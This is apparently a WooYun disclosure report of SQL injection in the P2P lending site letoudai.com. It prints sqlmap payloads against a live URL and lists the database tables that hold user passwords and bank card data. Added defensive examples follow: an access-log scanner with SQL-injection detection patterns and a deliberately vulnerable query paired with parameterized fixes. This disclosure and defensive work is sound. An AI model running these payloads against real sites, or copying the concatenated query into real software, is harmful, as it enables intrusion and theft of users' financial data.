
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144384

Title: P2P investment platform security: SQL injection in 乐投贷 (exposing the account passwords, payment passwords, names, bank card numbers and other data of over ten thousand users)

Vendor: 乐投贷

Author: 中央军

Submitted: 2015-10-01 13:39

Fix deadline: 2015-11-15 13:40

Disclosed: 2015-11-15 13:40

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-01: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed
2015-11-15: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

https://www.letoudai.com/invest/index/1*/export/1/serial_number/1/money/1

[Screenshot: 11.jpg]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: https://www.letoudai.com:443/invest/index/1') RLIKE (SELECT (CASE WHEN (6441=6441) THEN 1 ELSE 0x28 END)) AND ('WaVc'='WaVc/export/1/serial_number/1/money/1
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: https://www.letoudai.com:443/invest/index/1') AND EXTRACTVALUE(3581,CONCAT(0x5c,0x716b627171,(SELECT (ELT(3581=3581,1))),0x7178786271)) AND ('yTKa'='yTKa/export/1/serial_number/1/money/1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: https://www.letoudai.com:443/invest/index/1');SELECT SLEEP(5) AND ('SkQF'='SkQF/export/1/serial_number/1/money/1
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: https://www.letoudai.com:443/invest/index/1') AND 2619=BENCHMARK(5000000,MD5(0x4342426e)) AND ('rDDj'='rDDj/export/1/serial_number/1/money/1
---
web application technology: Nginx
back-end DBMS: MySQL 5.1
Database: ltd
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ltd_journal_account | 55005 |
| ltd_ips_return | 40041 |
| ltd_user_log | 38882 |
| ltd_jifen_log | 37981 |
| ltd_account_log | 35828 |
| ltd_phone_log | 30186 |
| ltd_borrow_repay | 20600 |
| ltd_email_log | 16450 |
| ltd_user_message | 16441 |
| ltd_ips_before | 16257 |
| ltd_account | 14961 |
| ltd_user | 14959 | // over ten thousand users
| ltd_user_info | 14959 |
| ltd_user_status | 14959 |
| ltd_user_vip | 12993 |
| ltd_weixin_news | 12944 |
| ltd_user_spread | 8264 |
| ltd_error_log | 8108 |
| ltd_borrow_tender | 7737 |
| ltd_account_recharge | 6397 |
| ltd_activity_log | 5776 |
| ltd_attachment | 4291 |
| ltd_account_cash | 4018 |
| ltd_borrow_verify | 526 |
| ltd_user_setting | 360 |
| ltd_borrow_quota | 244 |
| ltd_document | 220 |
| ltd_borrow | 206 |
| ltd_authmenu | 177 |
| ltd_menu | 169 |
| ltd_auth | 158 |
| ltd_borrow_reward | 132 |
| ltd_rating_info | 101 |
| ltd_attribute | 85 |
| ltd_borrow_che | 63 |
| ltd_borrow_vouch | 61 |
| ltd_borrow_register | 55 |
| ltd_config | 49 |
| ltd_borrow_pawn | 40 |
| ltd_weixindy_reply | 28 |
| ltd_user_auto | 25 |
| ltd_borrow_novice | 20 |
| ltd_user_address | 20 |
| ltd_manage_member | 18 |
| ltd_jifen_exchange | 15 |
| ltd_linkages | 15 |
| ltd_jifen_product | 14 |
| ltd_template | 14 |
| ltd_borrow_roam | 12 |
| ltd_document_category | 12 |
| ltd_weixin_menu | 12 |
| ltd_model | 10 |
| ltd_weixindy_menu | 10 |
| ltd_manage_group | 9 |
| ltd_remind | 9 |
| ltd_borrow_category | 8 |
| ltd_stock | 8 |
| ltd_navigation | 7 |
| ltd_addons | 6 |
| ltd_borrow_repayment | 6 |
| ltd_borrow_credit | 5 |
| ltd_borrow_institution | 5 |
| ltd_topic_config | 5 |
| ltd_weixin_media | 4 |
| ltd_api_account | 3 |
| ltd_autorepay_rule | 3 |
| ltd_hooks | 3 |
| ltd_user_autorepay | 3 |
| ltd_user_group | 3 |
| ltd_topic | 2 |
| ltd_jifen_category | 1 |
| ltd_topic_reply | 1 |
| ltd_topic_signin | 1 |
| ltd_weixin_repay | 1 |
+------------------------+---------+
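The sqlmap output above names the exact constructs that reached the database through the URI path: RLIKE, EXTRACTVALUE(, BENCHMARK(, SLEEP( and a quote-and-parenthesis break-out in a path segment that should only ever hold a number. The platform runs behind Nginx, so those same constructs are visible in its access log. The following is an added example, not code from the report or from the platform: it scans a few constructed Nginx access-log lines (the paths mirror the shape of the injection point, the IPs and timestamps are made up), URL-decodes each request path, and flags both the injection keywords and any /invest/index/<id> request whose id is not a plain integer. The route-shape check is the more durable of the two, because it does not depend on a keyword list.

```python
import re
from urllib.parse import unquote

# Constructed sample Nginx access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Oct/2015:13:20:01 +0800] "GET /invest/index/1/export/1/serial_number/1/money/1 HTTP/1.1" 200 5120
203.0.113.10 - - [01/Oct/2015:13:20:02 +0800] "GET /invest/index/1%27%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286441%3D6441%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%28%27WaVc%27%3D%27WaVc/export/1/serial_number/1/money/1 HTTP/1.1" 200 5120
203.0.113.10 - - [01/Oct/2015:13:20:03 +0800] "GET /invest/index/1%27%29%20AND%20EXTRACTVALUE%283581%2CCONCAT%280x5c%2C0x716b627171%29%29%20AND%20%28%27yTKa%27%3D%27yTKa/export/1/serial_number/1/money/1 HTTP/1.1" 500 612
203.0.113.10 - - [01/Oct/2015:13:20:09 +0800] "GET /invest/index/1%27%29%20AND%202619%3DBENCHMARK%285000000%2CMD5%280x4342426e%29%29%20AND%20%28%27rDDj%27%3D%27rDDj/export/1/serial_number/1/money/1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Oct/2015:13:21:00 +0800] "GET /invest/index/2/export/1/serial_number/1/money/1 HTTP/1.1" 200 5118
"""

# Minimal parser for the Nginx "combined"-style request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Keyword signatures taken from the techniques sqlmap reported against this endpoint
# (boolean-based RLIKE, error-based EXTRACTVALUE, stacked SELECT, BENCHMARK/SLEEP timing),
# plus the quote-paren-AND/OR break-out that all four payloads share.
SQLI_SIGNATURES = re.compile(
    r"(?i)(\bRLIKE\b|EXTRACTVALUE\s*\(|BENCHMARK\s*\(|\bSLEEP\s*\(|'\s*\)?\s*(?:AND|OR)\b|;\s*SELECT\b)"
)


def scan_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m["path"])  # decode %27, %29, %20 ... before matching
    reasons = []
    sig = SQLI_SIGNATURES.search(path)
    if sig:
        reasons.append("sqli-signature:" + sig.group(0).strip())
    # Route-shape check: /invest/index/<id>/... must carry a purely numeric id.
    parts = path.split("/")
    if len(parts) > 3 and parts[1] == "invest" and parts[2] == "index" and not parts[3].isdigit():
        reasons.append("non-numeric-id")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "path": path, "reasons": reasons}


def scan_log(text):
    """Scan a whole log text and return the list of findings in log order."""
    return [hit for hit in (scan_line(line) for line in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["reasons"])
        print("   ", hit["path"][:80])
```

Three of the five constructed lines are flagged, each by both checks; the two benign requests pass. In a real deployment the same scan would run over the decoded `$request_uri`, and a burst of flagged requests from one source IP against one route is the pattern to alert on.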

The ltd_user table contains account passwords and payment passwords:

[Screenshot: 12.png]

The ltd_user_info table contains names, bank card numbers and other personal information:

[Screenshot: 13.jpg]


Proof of vulnerability:

Remediation:
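The report leaves this section empty. The payload shape sqlmap recorded, `1') ... AND ('x'='x`, implies that the id taken from the path is dropped into a query that wraps it as `(... = '1')`, so the single quote and closing parenthesis let the rest of the WHERE clause be rewritten. The following is an added example, not the platform's code: it reconstructs that assumed query shape over an in-memory SQLite table with constructed rows, shows why the boolean-based blind technique works against it (the same request returns a row or nothing depending only on the attacker-supplied condition), and then shows the two fixes a defender applies in order: bind the value as a parameter so it is data rather than SQL, and validate that a route id is an integer before it goes anywhere near the database. The table name `invest` and its columns are assumptions.

```python
import re
import sqlite3


def make_db():
    """Constructed sample schema and rows; stands in for the platform's real table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invest (id INTEGER PRIMARY KEY, title TEXT, money INTEGER)")
    conn.executemany(
        "INSERT INTO invest VALUES (?, ?, ?)",
        [(1, "Project A", 1000), (2, "Project B", 2500)],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    """Assumed shape of the original query, inferred from the payload form 1') ... ('x'='x.
    The path segment is concatenated straight into the SQL text."""
    sql = f"SELECT id, title FROM invest WHERE (id = '{raw_id}')"
    return conn.execute(sql).fetchall()


def lookup_bound_only(conn, raw_id):
    """Fix 1: parameter binding. The whole segment is sent as one value, so a quote or
    parenthesis inside it can never terminate the string literal or change the clause."""
    return conn.execute("SELECT id, title FROM invest WHERE id = ?", (raw_id,)).fetchall()


def lookup_hardened(conn, raw_id):
    """Fix 2 (on top of binding): reject anything that is not a plain decimal integer before
    it reaches the database, so malformed ids fail fast and get logged, not executed."""
    if not re.fullmatch(r"\d{1,18}", raw_id):
        raise ValueError("invest id must be a decimal integer")
    return conn.execute("SELECT id, title FROM invest WHERE id = ?", (int(raw_id),)).fetchall()


def rejects(conn, raw_id):
    """True if the hardened lookup refuses the input instead of querying with it."""
    try:
        lookup_hardened(conn, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    true_cond = "1') AND ('a'='a"   # attacker condition that is true
    false_cond = "1') AND ('a'='b"  # attacker condition that is false
    print("vulnerable, true condition :", lookup_vulnerable(db, true_cond))
    print("vulnerable, false condition:", lookup_vulnerable(db, false_cond))
    print("bound only, same input     :", lookup_bound_only(db, true_cond))
    print("hardened, legitimate id    :", lookup_hardened(db, "1"))
    print("hardened rejects payload   :", rejects(db, true_cond))
```

Against the vulnerable lookup the two inputs differ only in the attacker's condition, yet one returns the row and the other returns nothing: that difference in the response is the oracle behind the "boolean-based blind" finding. With the value bound as a parameter, the identical input simply matches no row, and the validated version never issues the query at all.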

Copyright notice: please credit 中央军@乌云 as the source when reposting.


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report.

Vulnerability rank: 15 (WooYun rating)